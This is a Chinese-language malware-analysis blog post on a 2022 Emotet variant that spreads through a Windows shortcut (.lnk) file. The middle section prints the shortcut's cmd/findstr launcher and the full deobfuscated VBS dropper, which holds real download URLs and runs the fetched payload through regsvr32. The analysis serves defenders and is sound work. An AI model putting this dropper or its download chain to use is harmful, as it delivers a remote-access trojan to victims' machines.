Emotet的新形式-Link

今天发现Emotet出现了新的攻击方式

第一次接触Emotet是采用的常见的Office宏病毒,然后升级到后来的宏4.0,现在又出现了新的攻击方式——利用LInk文件进行攻击。

搜集到的样本包括Link文件生成VBS和PowerShell两种,以生成VBS文件为例。

文件名:Datos-2504.lnk

MD5: 95e0286c6c38320d9673b6492f9e2284

image-20220517144528337 
1
C:\Windows\system32\cmd.exe /v:on /c findstr "glKmfOKnQLYKnNs.*" "Datos-2504.lnk"                                                                                                                         > "%tmp%\YlScZcZKeP.vbs" & "%tmp%\YlScZcZKeP.vbs"

启动CMD调用findstr在文件内搜索以”glKmfOKnQLYKnNs.*”开头的字符串保存到”%tmp%\YlScZcZKeP.vbs”下,并执行。

Link文件本身包含VBS脚本。

image-20220517145225085

生成的YlScZcZKeP.vbs经过混淆。

image-20220517145700961

通过手工和WScript.StdOut.WriteLine方法去混淆得到可读代码。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
on error resume next
Set FSO = CreateObject("Scripting.FileSystemObject")

Function Base64Decode(ByVal vCode)
    With CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64")
        .dataType = "bin.base64"
        .text = vCode
        Base64Decode = Stream_BinaryToString(.nodeTypedValue)
    End With
End Function

Function Stream_BinaryToString(Binary)
    With CreateObject("ADODB.Stream")
        .Type = 1
        .Open
        .Write Binary
        .Position = 0
        .Type = 2
        .CharSet = "utf-8"
        Stream_BinaryToString = .ReadText
    End With
End Function

Dim LmPxinnpsd(6)


LmPxinnpsd(0) = "https://creemo.pl/wp-admin/ZKS1DcdquUT4Bb8Kb/"

LmPxinnpsd(1) = "http://filmmogzivota.rs/SpryAssets/gDR/"

LmPxinnpsd(2) = "http://demo34.ckg.hk/service/hhMZrfC7Mnm9JD/"

LmPxinnpsd(3) = "http://focusmedica.in/fmlib/IxBABMh0I2cLM3qq1GVv/"

LmPxinnpsd(4) = "http://cipro.mx/prensa/siZP69rBFmibDvuTP1L/"

LmPxinnpsd(5) = "http://colegiounamuno.es/cgi-bin/E/"


Execute("dIm xml,Ws,Db,FiLePaTH,uRL
xml = "MSXml2.SeRVERXmlhtTp.3.0"
Ws = "wscRipT.SHEll"
Db = "aDodb.STReam"
seT ImSHdnYdVR = CreAteOBjecT(ws)
TmP = imsHdnydvR.EXpANdeNvIroNmEnTSTrIngS("%tmp%")
wiNDiR = iMshDnYdvR.ExPAndenviroNmEnTstRiNgs("%wInDiR%") 

FilEPATH = tMp & "\KzcEXkekpr.Zvp"


CaLl prog
 SUb PROG
    ranDOmize
    INDeX = iNT((5 - 0 + 1)*rnD + 0)
    DiM msXML
	seT mSxML = CreateOBJEcT(xmL)
    dIM STreAM
	sEt stream = crEaTEOBjECT(DB)
    MsxML.oPEN "GEt", BasE64Decode(lmPxInNpsd(iNdEX)), FAlse
	msXML.sETReQueStheadEr "uSer-AgeNT", "vBKbaQgjyvRRbcgfvlsc"
	msxML.SEnd
    wiTH stream
	.TYPe = 1
	.OpEN
	.write MsXMl.rEspoNsEBody
	.savetOfIlE fILEPATH, 2
    end WitH
 end Sub")

ImshDnydVr.Exec(windir & "\sySTem32\regsVR32.Exe " & tmp & Base64Decode("XEtaY0VYa0VrcFIuWlZQ"))
FSO.GetFile(WScript.ScriptFullName).delete

和之前的VBA宏病毒样本一样都是从多个地址下载远控木马,然后通过regsvr32执行。

参考:

https://blog.cyble.com/2022/04/27/emotet-returns-with-new-ttps-and-delivers-lnk-files-to-its-victims/

https://www.bleepingcomputer.com/news/security/emotet-malware-now-installs-via-powershell-in-windows-shortcut-files/

对Link文件病毒感兴趣的可以参考这篇文章:

https://bbs.pediy.com/thread-260953.htm

样本分析
#Emotet
Emotet的新形式-Link
http://wangchenchina.github.io/2022/05/17/Emotet的新形式-Link/
作者
Demo
发布于
2022年5月17日
许可协议